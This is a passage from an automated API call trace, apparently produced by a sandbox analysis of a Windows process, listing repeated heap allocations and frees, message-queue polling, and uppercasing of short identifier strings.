0x29f7000 [0207.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0207.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0207.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0207.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0207.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0207.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0207.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0207.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0207.046] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0207.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0207.046] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0207.046] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.046] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e880 | out: hHeap=0x2af0000) returned 1 [0207.046] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ea40 [0207.047] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0207.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0207.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0207.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0207.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0207.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0207.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0207.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0207.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0207.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0207.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0207.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0207.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0207.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0207.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0207.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0207.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ea0 [0207.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0207.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0207.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0207.047] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0207.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0207.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9d8 | out: hHeap=0x2af0000) returned 1 [0207.047] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0207.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0207.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ea0 | out: hHeap=0x2af0000) returned 1 [0207.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0207.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0207.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0207.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0207.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0207.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0207.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0207.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0207.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0207.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0207.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0207.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0207.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0207.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0207.048] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0207.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0207.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0207.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0207.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0207.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0207.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72aa8 [0207.048] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0207.048] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0207.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0207.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0207.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0207.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0207.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0207.049] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0207.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0207.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70c0 [0207.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f70c0 | out: hHeap=0x2af0000) returned 1 [0207.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0207.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72aa8 | out: hHeap=0x2af0000) returned 1 [0207.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0207.049] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0207.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0207.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0207.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0207.049] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0207.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0207.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b28 | out: hHeap=0x2af0000) returned 1 [0207.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0207.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b28 [0207.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0207.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0207.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0207.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0207.049] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0207.049] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a73128 [0207.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0207.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0207.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0207.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a730a8 [0207.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0207.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0207.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0207.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a716e8 [0207.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0207.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71718 [0207.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71718 | out: hHeap=0x2af0000) returned 1 [0207.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa8a0 [0207.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0207.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0207.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0207.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0207.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0207.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0207.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0207.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0207.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0207.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0207.050] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0207.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0207.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0207.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0207.050] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0207.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0207.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0207.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0207.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0207.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0207.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0207.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0207.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0207.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0207.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0207.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0207.051] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0207.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0207.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0207.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0207.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a718f8 [0207.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0207.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0207.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0207.051] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0207.051] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0207.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78278 | out: hHeap=0x2af0000) returned 1 [0207.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a718f8 | out: hHeap=0x2af0000) returned 1 [0207.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0207.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0207.051] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0207.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0207.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0207.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0207.052] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0207.052] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0207.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0207.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0207.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78340 [0207.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0207.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0207.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0207.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0207.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0207.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0207.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0207.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0207.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0207.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0207.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78340 | out: hHeap=0x2af0000) returned 1 [0207.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0207.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0207.052] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0207.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0207.052] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0207.052] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0207.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0207.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0207.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0207.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0207.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0207.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a28 [0207.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0207.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0207.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0207.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0207.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78188 | out: hHeap=0x2af0000) returned 1 [0207.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0207.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0207.053] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0207.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0207.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8e8 | out: hHeap=0x2af0000) returned 1 [0207.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0207.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0207.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0207.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0207.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0207.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae10 [0207.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719a8 [0207.053] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae10 | out: hHeap=0x2af0000) returned 1 [0207.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0207.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab40 [0207.053] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac78 [0207.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780e8 | out: hHeap=0x2af0000) returned 1 [0207.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0207.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0207.054] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0207.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0207.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0207.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0207.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0207.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaad38 [0207.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0207.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780e8 [0207.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacd8 [0207.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b68 [0207.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaacd8 | out: hHeap=0x2af0000) returned 1 [0207.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0207.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacd8 [0207.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaacf0 [0207.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0207.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0207.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0207.054] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0207.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0207.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0207.054] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0207.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0207.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0207.054] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaac90 [0207.055] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 